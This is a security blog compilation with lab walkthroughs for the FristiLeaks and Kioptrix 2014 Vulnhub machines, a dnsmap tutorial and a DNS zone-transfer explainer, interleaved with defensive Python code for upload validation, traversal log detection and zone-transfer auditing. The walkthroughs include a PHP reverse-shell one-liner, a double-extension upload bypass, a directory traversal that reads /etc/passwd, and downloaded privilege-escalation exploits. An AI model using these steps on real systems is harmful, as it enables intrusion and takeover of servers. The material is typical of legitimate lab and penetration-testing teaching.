FristiLeaks: 1.3 Vulnhub Walkthrough

Hi, let's see how we rooted Fristi by Ar0xA from Vulnhub.

First, find the IP and do a port scan.

We have only one port open. Let's scan using Nikto and Gobuster.

Now Gobuster.

Visit the pages found. Nothing interesting. Right?

We need to find something else. Have a look at the following address.

A login page, right?

Let's try breaking it. SQL injection didn't work. There must be some other way. Let's have a look at the source code.

We need to clean this up for production. I left some junk in here to make testing easier.

- by eezeepz

Need to look more 🙂 Scroll down to the end.


Looks like this is base64 encoded. Let's try decoding it.

Visit the site below for decoding.

Seems like a PNG image? Let's try decoding it as an image here:

We got an Image.

Hopefully this is the password. But what about the username? admin? fristi?

They didn't work. Let's try eezeepz.

Yes, we are logged in now. We have a file upload form here, but it accepts only images.

We need to upload a php shell as an image here.

I used this shell:

Rename the file to shell.php.gif and upload.

Fire up Burpsuite and catch the upload request.

Edit the filename in the request to shell.php.gif and send.

We get a response saying it was uploaded to the uploads directory. Now head to /uploads/shell.php.gif.
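Two things in this walkthrough come down to looking at the first bytes of a blob: the base64 comment that turned out to be a PNG, and the upload form that accepted shell.php.gif because it trusted the file name. The Python below is an added example (not code from the walkthrough or from the FristiLeaks VM) that does both: it decodes a base64 blob and identifies it by magic bytes, and it shows the server-side upload check the form was missing, which rejects double extensions and requires the content to match the declared image type. The magic-byte table, the SAMPLE_B64 blob and the function names are constructed for this example.

```python
import base64
import binascii
import secrets
from pathlib import Path
from typing import Optional, Tuple

# Leading magic bytes of common image formats (table constructed for this example).
MAGIC = {
    "png": (b"\x89PNG\r\n\x1a\n",),
    "jpg": (b"\xff\xd8\xff",),
    "gif": (b"GIF87a", b"GIF89a"),
}


def identify_image(data: bytes) -> Optional[str]:
    """Return the image type implied by the first bytes, or None if it is not an image."""
    for kind, signatures in MAGIC.items():
        if data.startswith(signatures):
            return kind
    return None


def decode_base64_blob(text: str) -> Optional[bytes]:
    """Decode a base64 blob copied out of page source; whitespace is tolerated, garbage rejected."""
    try:
        return base64.b64decode("".join(text.split()), validate=True)
    except (binascii.Error, ValueError):
        return None


def decode_embedded_image(text: str) -> Optional[Tuple[str, int]]:
    """(kind, size) when the blob decodes to a recognised image, otherwise None."""
    data = decode_base64_blob(text)
    if data is None:
        return None
    kind = identify_image(data)
    return None if kind is None else (kind, len(data))


def validate_upload(filename: str, data: bytes) -> Tuple[bool, str]:
    """Server-side check for an 'images only' upload form.

    Rejects names with more than one extension (shell.php.gif), requires the
    extension to be an allowed image type, and requires the content's magic
    bytes to agree with it. The stored name is generated by the server, so the
    client-supplied name never reaches the filesystem.
    """
    parts = Path(filename).name.split(".")
    if len(parts) != 2:
        return False, "exactly one extension allowed"
    ext = parts[1].lower()
    ext = "jpg" if ext == "jpeg" else ext
    if ext not in MAGIC:
        return False, f"extension .{ext} not allowed"
    if identify_image(data) != ext:
        return False, "content does not match extension"
    return True, f"{secrets.token_hex(8)}.{ext}"


# Constructed sample: a PNG signature followed by eight zero bytes, base64 encoded.
SAMPLE_B64 = base64.b64encode(b"\x89PNG\r\n\x1a\n" + bytes(8)).decode()

if __name__ == "__main__":
    print(decode_embedded_image(SAMPLE_B64))
    print(validate_upload("shell.php.gif", b"GIF89a" + bytes(10)))
    print(validate_upload("photo.gif", b"GIF89a" + bytes(10)))
```

Even with this check in place, the upload directory should be served with script execution disabled, so that a file which slips through is still only ever delivered as bytes.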

Now we can set up a listener on our Kali machine and connect from this shell.

nc -nlvp 4444

Enter the following command and click Exec.

php -r '$sock=fsockopen("",1234);exec("/bin/sh -i <&3 >&3 2>&3");'

We got a connection to our Kali machine.

Now it's time for privilege escalation. Use the command uname -a to find the OS and kernel version.

Let's search for an exploit.

What about using this?

Let's try.

Let's download the file using wget.

Time to compile and run the exploit.

Done! We have a new user firefart with password pass.

Let's see if it is present in /etc/passwd.

Yes, it's there at the top. Now let's switch to our new account and check for root access.

Yes! We are root now. What about the flag?

That's all. It took me a little more time to find the fristi directory, but the privilege escalation part was quick.

Kioptrix: 2014 (#5) Vulnhub Walkthrough

In this blog post we will see how to root the Kioptrix 2014 Machine from Vulnhub.

First, let's find the IP and the open ports on the machine using nmap:


Here we have the IP.

Port 80 is open, so there will be a web server running; let's have a look.

Yes, there is a page. Anything behind that? Let's have a look at the source code.

Here we have ‘pChart2.1.3’. Now we need to know what pChart is. Let's do a quick Google search.

The website says it is a PHP-based charting library. Now let's look for any existing vulnerabilities in pChart 2.1.3.

Exploit-DB says there are directory traversal and XSS vulnerabilities in pChart 2.1.3.

Let's try that by visiting the following page.

We have got the /etc/passwd file displayed in the browser.

Now let's try to read the httpd.conf file.

It works!
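The traversal works because the script serves whatever path the request names, and each request leaves a line in the Apache access log. As an added example (not from the walkthrough or from pChart), here is the defender's side in Python: a scanner that flags traversal sequences in access-log lines, including double-encoded ones that defeat a single round of decoding, beside the path check that confines served files to the document root. The log lines, the /app/view.php path and the /srv/www document root are constructed for this example.

```python
import re
from pathlib import Path
from typing import List, Optional, Tuple
from urllib.parse import unquote

# Apache "combined" format: host ident user [time] "method target proto" status size "referer" "agent"
LOG_RE = re.compile(
    r'^(?P<host>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) \S+" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<referer>[^"]*)" "(?P<agent>[^"]*)"$'
)

# A parent-directory step followed by a separator; "a..b.html" does not match.
TRAVERSAL_RE = re.compile(r"\.\.[/\\]")


def is_traversal(target: str, max_decode: int = 3) -> bool:
    """True if the request target contains '../' after repeated percent-decoding.

    Attackers double-encode (%252e%252e%252f) to slip past filters that decode once,
    so decode until the string stops changing, up to max_decode rounds.
    """
    decoded = target
    for _ in range(max_decode):
        nxt = unquote(decoded)
        if nxt == decoded:
            break
        decoded = nxt
    return bool(TRAVERSAL_RE.search(decoded))


def scan_access_log(lines) -> List[Tuple[str, str, str]]:
    """Return (client, target, status) for every parsable line that carries a traversal."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if m and is_traversal(m["target"]):
            hits.append((m["host"], m["target"], m["status"]))
    return hits


def resolve_within(base_dir: Path, requested: str) -> Optional[Path]:
    """Server-side fix: resolve the requested name and refuse anything outside base_dir."""
    base = base_dir.resolve()
    candidate = (base / unquote(requested).lstrip("/\\")).resolve()
    try:
        candidate.relative_to(base)
    except ValueError:
        return None
    return candidate


# Constructed sample log: one benign request, a plain and a double-encoded traversal,
# and a file name containing ".." that is not a traversal.
SAMPLE_LOG = [
    '10.0.0.5 - - [10/Oct/2023:13:55:36 +0000] "GET /index.html HTTP/1.1" 200 1043 "-" "Mozilla/5.0"',
    '10.0.0.7 - - [10/Oct/2023:13:55:40 +0000] "GET /app/view.php?file=../../../../etc/passwd HTTP/1.1" 200 1780 "-" "curl/7.88.1"',
    '10.0.0.7 - - [10/Oct/2023:13:55:41 +0000] "GET /app/view.php?file=%252e%252e%252fetc%252fpasswd HTTP/1.1" 200 1780 "-" "curl/7.88.1"',
    '10.0.0.9 - - [10/Oct/2023:13:56:02 +0000] "GET /docs/a..b.html HTTP/1.1" 404 220 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for hit in scan_access_log(SAMPLE_LOG):
        print("traversal:", hit)
    print(resolve_within(Path("/srv/www"), "../../etc/passwd"))
    print(resolve_within(Path("/srv/www"), "images/chart.png"))
```

A 200 status on a flagged line, as in the sample, is the signal that the traversal actually returned content; a 404 on the same pattern still shows someone probing.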

When we scroll down to the end, we will find something interesting.

SetEnvIf User-Agent ^Mozilla/4.0 Mozilla4_browser

<VirtualHost *:8080>
    DocumentRoot /usr/local/www/apache22/data2

<Directory "/usr/local/www/apache22/data2">
    Options Indexes FollowSymLinks
    AllowOverride All
    Order allow,deny
    Allow from env=Mozilla4_browser


If our user agent is Mozilla/4.0, we can connect to port 8080.

Let's try that.

curl -H "User-Agent:Mozilla/4.0"

And the result is,

We have a hyperlink here to /phptax/. Let's try this in a browser.

I'm using a Firefox extension to switch user agents. Get it here:

I’ve installed the extension and activated the custom user agent for our machine.

Now let’s load the page in browser.

Going Inside..

This looks like an app for filling in tax forms. OK, so let's look whether there are any known vulnerabilities in this.

According to Exploit-DB, there is an RCE vulnerability in PhpTax.

Let's try to exploit that with Metasploit.

search phptax

Now let's set the options.

Now enter run to run the exploit.

We got the shell now.

Now use the whoami command to know the current user.

Now use command /bin/sh -i to get a fully interactive shell.

Let's now get the OS version the machine is running.

Use the command uname -a for that.

We are on FreeBSD 9.0. Let's look online for available exploits.

We have a privilege escalation exploit on Exploit-DB. Let's try that.

Download the exploit to our Kali machine.

wget exploit.c -O exploit.c

Time to send the file to target machine. The target does not have wget or curl. So we will use netcat to transfer the file.

Let's start a listener on our Kali machine and send the file to the target machine's /tmp directory.

On the target machine,

Now we got the exploit file on our target.

Now let's compile it using gcc.

Time to exploit!

We are root now!

DNSMAP Tutorial, What is it and How to use it?

DNSMAP is a tool for identifying the subdomains of a given domain. It is used by pentesters during the information gathering/enumeration phase of infrastructure security assessments.

Subdomain brute-forcing is another technique that should be used in the enumeration stage, as it’s especially useful when other domain enumeration techniques such as zone transfers don’t work.

Installing DNSMAP

If you don't have DNSMAP installed on your machine, install it using the following command.

sudo apt install dnsmap


Using DNSMAP we can scan for the subdomains of a domain simply by entering the domain name and specifying a wordlist file, as shown in the example.

In addition, we can export the results to a Comma Separated Values (CSV) file, set a delay between DNS requests and ignore specific IPs during the enumeration.

If we don't specify a wordlist file, the program loads its default wordlist and uses a random waiting time between requests.


Other examples

Specifying a custom wordlist (example.com stands in for the target domain):

dnsmap example.com -w yourwordlist.txt

Specifying a results file:

dnsmap example.com -r dnsmap_results.txt

Specifying a custom delay between requests (in milliseconds):

dnsmap example.com -d 3000
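To make clear what dnsmap is doing behind those options, here is an added Python sketch of the same loop (not dnsmap's own code): it appends each wordlist entry to the domain, resolves the name, honours a per-request delay and an ignore-IP list, and renders the findings as CSV. The fake_resolver and its example.com records are constructed so the demo runs offline; they also model wildcard DNS, where every guessed name resolves to the same address, which is the usual reason to ignore an IP during enumeration. To run it against a real resolver, pass system_resolver instead.

```python
import csv
import io
import socket
import time
from typing import Callable, Dict, Iterable, List, Optional

Resolver = Callable[[str], Optional[str]]


def system_resolver(name: str) -> Optional[str]:
    """Resolve through the OS resolver; None when the name does not exist."""
    try:
        return socket.gethostbyname(name)
    except socket.gaierror:
        return None


def enumerate_subdomains(
    domain: str,
    words: Iterable[str],
    resolver: Resolver = system_resolver,
    delay_ms: int = 0,
    ignore_ips: Iterable[str] = (),
) -> List[Dict[str, str]]:
    """Brute-force <word>.<domain> for every wordlist entry and keep the names that resolve.

    Addresses in ignore_ips are dropped, which is how a wildcard record (every name
    resolving to one catch-all IP) is kept from flooding the results.
    """
    ignored = set(ignore_ips)
    found: List[Dict[str, str]] = []
    for word in words:
        word = word.strip()
        if not word or word.startswith("#"):  # skip blanks and comments in the wordlist
            continue
        fqdn = f"{word}.{domain}"
        ip = resolver(fqdn)
        if ip is not None and ip not in ignored:
            found.append({"hostname": fqdn, "ip": ip})
        if delay_ms:
            time.sleep(delay_ms / 1000)
    return found


def to_csv(rows: List[Dict[str, str]]) -> str:
    """Render results the way a -c style CSV export would."""
    buf = io.StringIO()
    writer = csv.DictWriter(buf, fieldnames=["hostname", "ip"], lineterminator="\n")
    writer.writeheader()
    writer.writerows(rows)
    return buf.getvalue()


# Constructed fake zone: two real hosts plus a wildcard that answers 203.0.113.9 for anything else.
FAKE_ZONE = {"www.example.com": "203.0.113.10", "mail.example.com": "203.0.113.20"}


def fake_resolver(name: str) -> Optional[str]:
    return FAKE_ZONE.get(name, "203.0.113.9")


WORDLIST = ["www", "mail", "dev", "# comment line", ""]


def demo() -> List[Dict[str, str]]:
    """Enumerate the fake zone with the wildcard address ignored."""
    return enumerate_subdomains("example.com", WORDLIST, resolver=fake_resolver,
                                ignore_ips=["203.0.113.9"])


if __name__ == "__main__":
    print(to_csv(demo()))
```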

DNS Zone Transfer Vulnerability, What is it?

A DNS server is a database that stores IP addresses and domain names and related information. The primary duty of a DNS server is to resolve domain names to IP addresses.

DNS Zone File

A DNS zone file is a simple text file that holds the data for a domain: the mapping of domain names to IP addresses and other resource records. A zone file can contain data about multiple subdomains, and a DNS server can hold multiple zone files.

Master and Slave DNS Servers

A master DNS server is the server that holds the master copy of the zone file. When this file is updated, the slave DNS servers request a copy of it and update their own zone file.

What is Zone Transfer

DNS zone transfer is the process of copying the DNS information from a master DNS server to a slave DNS server. The primary/master DNS server should allow zone transfers only to its secondary/slave servers. The zone transfer vulnerability arises when the primary server allows a zone transfer to anyone who requests it.

By exploiting this vulnerability, attackers can get a copy of the zone file. This may not have a direct impact on the organization, but the attackers can collect a lot of information about its IP addresses and hostnames, which helps them plan how to break into the organization.
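As an added example (not from the post), the following Python audits a BIND named.conf fragment for exactly this misconfiguration: for each zone it works out the effective allow-transfer ACL, inheriting the global one from the options block when the zone sets none, and reports zones that would answer a transfer request from anyone. The configuration text is constructed, the zone names are example.com placeholders and the 192.0.2.x addresses are documentation addresses; the internal.example.com block shows the corrected form, where transfers are limited to the secondary servers.

```python
import re
from typing import Dict, List, Optional

# Constructed named.conf fragment: a global "any", one zone that repeats it, one zone
# restricted to its secondaries, and one zone that inherits the global setting.
SAMPLE_NAMED_CONF = """
options {
    directory "/var/named";
    allow-transfer { any; };
};

zone "example.com" {
    type master;
    file "example.com.zone";
    allow-transfer { any; };
};

zone "internal.example.com" {
    type master;
    file "internal.zone";
    allow-transfer { 192.0.2.53; 192.0.2.54; };
};

zone "legacy.example.com" {
    type master;
    file "legacy.zone";
};
"""

# Matches the opening of an options block or a zone block, up to and including its "{".
BLOCK_RE = re.compile(r'(?P<kind>options|zone\s+"(?P<name>[^"]+)")\s*\{')


def _block_body(text: str, start: int) -> str:
    """Return the text between the brace at `start` and its matching closing brace."""
    depth = 0
    for i in range(start, len(text)):
        if text[i] == "{":
            depth += 1
        elif text[i] == "}":
            depth -= 1
            if depth == 0:
                return text[start + 1:i]
    raise ValueError("unbalanced braces in configuration")


def allow_transfer_acl(body: str) -> Optional[List[str]]:
    """ACL entries of the block's allow-transfer statement, or None if it has none."""
    m = re.search(r"allow-transfer\s*\{([^}]*)\}", body)
    if not m:
        return None
    return [entry.strip() for entry in m.group(1).split(";") if entry.strip()]


def audit_zone_transfers(conf: str) -> Dict[str, str]:
    """Map each zone name to a verdict on who may pull a full copy of it."""
    global_acl: Optional[List[str]] = None
    zone_acls: Dict[str, Optional[List[str]]] = {}
    for m in BLOCK_RE.finditer(conf):
        body = _block_body(conf, m.end() - 1)
        acl = allow_transfer_acl(body)
        if m.group("kind") == "options":
            global_acl = acl
        else:
            zone_acls[m.group("name")] = acl

    verdicts: Dict[str, str] = {}
    for name, acl in zone_acls.items():
        effective = acl if acl is not None else global_acl
        if effective is None:
            # No ACL anywhere: BIND's traditional default is to allow transfers to any host.
            verdicts[name] = "OPEN (no allow-transfer set; default permits any host)"
        elif any(entry.lower() == "any" for entry in effective):
            verdicts[name] = "OPEN (allow-transfer { any; })"
        else:
            verdicts[name] = "restricted to " + ", ".join(effective)
    return verdicts


if __name__ == "__main__":
    for zone, verdict in audit_zone_transfers(SAMPLE_NAMED_CONF).items():
        print(f"{zone}: {verdict}")
```

The fix the audit points at is the same in every case: set allow-transfer to the secondaries' addresses (or a TSIG key) in the options block so every zone inherits it, and only widen it per zone when there is a reason to.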